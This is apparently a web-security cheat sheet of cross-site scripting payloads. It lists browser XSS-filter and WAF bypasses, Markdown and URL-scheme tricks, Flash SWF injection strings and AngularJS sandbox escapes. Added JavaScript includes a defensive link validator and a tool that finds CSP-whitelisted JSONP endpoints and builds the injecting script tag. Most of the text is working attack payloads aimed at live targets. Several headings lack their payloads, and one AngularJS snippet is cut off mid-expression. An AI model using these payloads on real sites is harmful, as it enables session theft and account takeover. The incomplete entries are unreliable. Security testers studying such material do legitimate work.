## XSS
**Chrome XSS-Auditor Bypass** by [@vivekchsm](https://twitter.com/vivekchsm)

```
<svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
```
**Chrome < v60 beta XSS-Auditor Bypass**

```
<script src="data:,alert(1)%250A-->
```
**Other Chrome XSS-Auditor Bypasses**

```
<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
```
**Safari XSS Vector** by [@mramydnei](https://twitter.com/mramydnei/status/902470271327551489)

```
<script>location.href;'javascript:alert%281%29'</script>
```
**XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```
**Kona WAF (Akamai) Bypass**
**ModSecurity WAF Bypass**

Note: whether this works depends on the security (paranoia) level the rule set is configured for. See: https://modsecurity.org/rules.html

```
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
```
**Wordfence XSS Bypasses**

```
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
```
**Incapsula WAF Bypasses** by [@i_bo0om](https://twitter.com/i_bo0om)

```
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
```
**jQuery < 3.0.0 XSS** by [Egor Homakov](https://github.com/jquery/jquery/issues/2432)

To actually exploit this jQuery XSS you need one of the following:

1) Any cross-domain request to an untrusted domain, whose response may inadvertently be executed as script.
2) Any request to a trusted API endpoint where script can be injected into the data source.
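The mechanism behind those two requirements, as an added example that is not jQuery's own code: a model of how `$.get(url, cb)` with no explicit `dataType` lets the response `Content-Type` decide whether the body is executed, and why the 3.0 fix (Content-Type sniffing for `script` is disabled only on cross-domain requests) closes case 1 but leaves case 2 open. The `CONTENTS` regexes copy jQuery's defaults; the origins, URLs and response bodies are constructed for the example.

```javascript
// Added example (not jQuery's code): a small model of how jQuery.ajax picks
// the response dataType when $.get(url, cb) is called with no explicit
// dataType, and when the body is then run as script. The regexes copy
// jQuery's default `contents` table; everything else is a simplification
// of the real ajax pipeline.

const CONTENTS = {
  xml: /\bxml\b/,
  html: /\bhtml/,
  json: /\bjson\b/,
  script: /\b(?:java|ecma)script\b/,
};

function isCrossDomain(pageOrigin, url) {
  return new URL(url, pageOrigin).origin !== pageOrigin;
}

// Sniff the dataType from Content-Type; first match in table order wins.
// `allowScript` models jQuery 3.0's `contents.script = false` prefilter.
function inferDataType(contentType, allowScript) {
  for (const [type, re] of Object.entries(CONTENTS)) {
    if (type === 'script' && !allowScript) continue;
    if (re.test(contentType)) return type;
  }
  return 'text';
}

// Resolve one response the way $.get would, and execute it if the
// resolved dataType is script. `sink` collects side effects so a caller
// can observe what the "attacker" body did.
function handleResponse({ pageOrigin, url, contentType, body, dataType, jqueryMajor }) {
  const crossDomain = isCrossDomain(pageOrigin, url);
  // jQuery < 3.0: Content-Type alone decides. jQuery >= 3.0: script sniffing
  // is switched off for cross-domain requests; same-origin is unchanged.
  const allowScript = !(jqueryMajor >= 3 && crossDomain);
  const resolved = dataType || inferDataType(contentType, allowScript);
  const sink = [];
  if (resolved === 'script') {
    // Stands in for jQuery.globalEval: the body runs with page privileges.
    new Function('sink', body)(sink);
  }
  return { dataType: resolved, crossDomain, executed: sink };
}

// Constructed sample responses (not real endpoints).
const SAMPLES = {
  // Case 1: cross-domain request to a host the attacker controls.
  attackerHosted: {
    pageOrigin: 'https://app.example',
    url: 'https://attacker.example/jqueryxss',
    contentType: 'text/javascript; charset=utf-8',
    body: "sink.push('ran on app.example')",
  },
  // Case 2: same-origin API whose JS response carries injected data.
  sameOriginApi: {
    pageOrigin: 'https://app.example',
    url: '/api/profile',
    contentType: 'application/javascript',
    body: "sink.push('ran via trusted API')",
  },
};
```

Running `handleResponse` over `SAMPLES.attackerHosted` with `jqueryMajor: 2` executes the body; with `jqueryMajor: 3` the same response resolves to `text` and nothing runs. `SAMPLES.sameOriginApi` executes under both, which is the second requirement above.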
**URL verification bypasses (works without the `&#x09;` too)**

```
javas&#x09;cript://www.google.com/%0Aalert(1)
```
**Markdown XSS**

```
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))
```
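The check that defeats both the URL verification bypass and the Markdown link payloads above, as an added example that is not part of the original page: a link-scheme validator that decodes entities and strips the whitespace a browser ignores before deciding, placed next to the naive `startsWith('javascript:')` check those payloads were written to slip past. It assumes the Markdown or HTML renderer hands over the raw `href` string before it is emitted; the function and constant names are this example's own.

```javascript
// Added example (not from the original page): a link-scheme check that
// resists the bypasses listed above, beside the naive check they defeat.

// Entity decoding as a browser does it inside an attribute value: numeric
// references (with or without ';') plus the named ones that matter for
// scheme smuggling.
const NAMED = { tab: '\t', newline: '\n', colon: ':', lt: '<', gt: '>', amp: '&', quot: '"' };
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '\ufffd');
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&([a-z]+);?/gi, (m, n) => (n.toLowerCase() in NAMED ? NAMED[n.toLowerCase()] : m));
}

// Mirrors the URL parser's pre-processing: strip leading/trailing C0
// controls and space, then drop every ASCII tab/newline anywhere in the
// string. "javas<TAB>cript:" therefore becomes "javascript:".
function normalizeUrl(href) {
  return decodeEntities(href)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// Scheme of a URL, lower-cased; null means the URL is relative.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Naive blocklist check of the kind these payloads bypass: it never sees
// the decoded, whitespace-stripped form the browser acts on.
function naiveIsSafe(href) {
  return !href.trim().toLowerCase().startsWith('javascript:');
}

// Hardened check: normalize first, then allow only known-good schemes.
// Relative URLs have no scheme and are allowed.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
function isSafeHref(href) {
  const scheme = schemeOf(normalizeUrl(href));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}
```

The allowlist is the important design choice: blocking `javascript:` alone still lets `data:` and `vbscript:` through, and any blocklist has to be re-derived each time a new decoding trick appears, whereas the allowlist only needs the normalization to match what the browser does.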
**Flash SWF XSS**
- ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf`
- plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&`
- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants)
- FlashMediaElement: `flashmediaelement.swf?jsinitfunctio%gn=alert`1``
- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`
- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<`
- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
- AutoDemo: `control.swf?onend=javascript:alert(1)//`
- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
- SWFUpload: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
- Uploadify (legacy): `uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf`
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`

_Note: a useful reference on constructing Flash-based XSS payloads is available at [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._

**Lightweight Markup Languages**
**RubyDoc** (.rdoc)

**Textile** ([.textile](https://txstyle.org/))

```
"Test link":javascript:alert(1)
```

**reStructuredText** ([.rst](http://docutils.sourceforge.net/docs/user/rst/quickref.html))

```
`Test link`__.
__ javascript:alert(document.domain)
```
**Unicode characters**

```
†‡•<img src=a onerror=javascript:alert('test')>…‰€
```

**AngularJS Template Injection based XSS**

*For manual verification on a live target, run `angular.version` in the browser console; its `full` field gives the exact version to match against the ranges below.*

**1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)

**1.2.0 - 1.2.1** by [Jan Horn (Google)](https://twitter.com/tehjh)

**1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)

**1.2.6 - 1.2.18** by [Jan Horn (Google)](https://twitter.com/tehjh)

**1.2.19 - 1.2.23** by [Mathias Karlsson](https://twitter.com/avlidienbrunn)

**1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)

**1.3.0** by [Gábor Molnár (Google)](https://twitter.com/molnar_g)

```
{{!ready && (ready = true) && (
      ? $$watchers[0].get(toString.constructor.prototype)
      : (a = apply) &&
        (apply = constructor) &&
        (valueOf = call) &&
          'F = Function.prototype;' +
          'F.apply = F.a;' +
          'delete F.a;' +
          'delete F.valueOf;' +
```

**1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)

**1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)

```
$eval('x=alert(1)//'); }}
```

**1.3.19** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)

**1.3.20** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)

**1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)

```
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
```

**1.5.0 - 1.5.8** by [Ian Hickey](https://twitter.com/ianhickey1024)

```
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
```

**1.5.9 - 1.5.11** by [Jan Horn (Google)](https://twitter.com/tehjh)

**1.6.0+** (no [Expression Sandbox](http://angularjs.blogspot.co.uk/2016/09/angular-16-expression-sandbox-removal.html)) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
**Content Security Policy (CSP) bypass via JSONP endpoints**
Grab the target's CSP (header names are case-insensitive, so grep with `-i`; if the header is missing on a `HEAD` request, fetch the page with `curl -s -D - -o /dev/null` instead, and remember that a policy can also be delivered in the HTML via `<meta http-equiv="Content-Security-Policy">`):

```
curl -sI http://example.com | grep -i 'content-security-policy'
```

Either paste the CSP into https://csp-evaluator.withgoogle.com/ or submit the target's address into the "Content Security Policy" field. The CSP Evaluator flags any whitelisted `script-src` host that is known to expose JSONP endpoints.

![image](https://user-images.githubusercontent.com/18099289/32136707-a1c12510-bc12-11e7-8a80-8a22b3e94232.png)

Now use a Google dork to find JSONP endpoints on the whitelisted domains:

```
site:example.com inurl:callback
```
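The same procedure in code, as an added example that is not part of the original page: parse the CSP header, list the `script-src` host expressions worth auditing for JSONP (keywords, nonces and bare schemes cannot host one), check which of the endpoints found by dorking a `<script src>` is actually allowed to load, and build the tag that turns the callback parameter into code. The header value, the endpoint URLs and the `callbackParam` field are constructed for this example; host matching ignores the path component, which over-approximates.

```javascript
// Added example (not from the original page): CSP parsing and the JSONP
// bypass check that follows from it. All sample data below is constructed.

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// script-src falls back to default-src when it is absent.
function effectiveScriptSrc(policy) {
  return policy['script-src'] || policy['default-src'] || [];
}

// Keyword sources ('self', 'nonce-...', 'unsafe-inline') and bare schemes
// (https:) are not hosts; everything else is a host expression to audit.
function auditableHosts(policy) {
  return effectiveScriptSrc(policy).filter(
    (src) => !/^'.*'$/.test(src) && !/^[a-z][a-z0-9+.-]*:$/i.test(src)
  );
}

// Does a host expression (optional scheme, port, path, "*." prefix) cover
// `host`? Path matching is deliberately ignored here.
function sourceAllowsHost(src, host) {
  const h = src
    .replace(/^[a-z][a-z0-9+.-]*:\/\//i, '')
    .replace(/[:/].*$/, '')
    .toLowerCase();
  if (h === '*') return true;
  if (h.startsWith('*.')) return host.endsWith(h.slice(1));
  return h === host;
}

// Given JSONP endpoints found by dorking, return the first one a script
// tag is allowed to load under this policy, or null.
function findJsonpBypass(header, endpoints) {
  const hosts = auditableHosts(parseCsp(header));
  for (const ep of endpoints) {
    const host = new URL(ep.url).hostname.toLowerCase();
    if (hosts.some((src) => sourceAllowsHost(src, host))) return ep;
  }
  return null;
}

// The callback parameter is reflected into the response body as code, so
// whatever is put there runs under the page's origin despite the CSP.
function jsonpBypassTag(endpoint, payload) {
  const u = new URL(endpoint.url);
  u.searchParams.set(endpoint.callbackParam, payload);
  return `<script src="${u.href}"></script>`;
}

// Constructed sample input (not real hosts or endpoints).
const SAMPLE_CSP =
  "default-src 'self'; script-src 'self' https://cdn.example.com *.widgets.example.net; object-src 'none'";
const SAMPLE_ENDPOINTS = [
  { url: 'https://attacker.example/jsonp', callbackParam: 'callback' },
  { url: 'https://cdn.example.com/api/v1/items', callbackParam: 'callback' },
];
```

`findJsonpBypass(SAMPLE_CSP, SAMPLE_ENDPOINTS)` rejects the attacker-hosted endpoint and returns the one on `cdn.example.com`; `jsonpBypassTag` on that result yields the `<script>` tag an injection point would need. A policy with only `'self'` and no whitelisted hosts returns `null`, which is the state to aim for when fixing the policy (or the JSONP endpoint should validate its callback name).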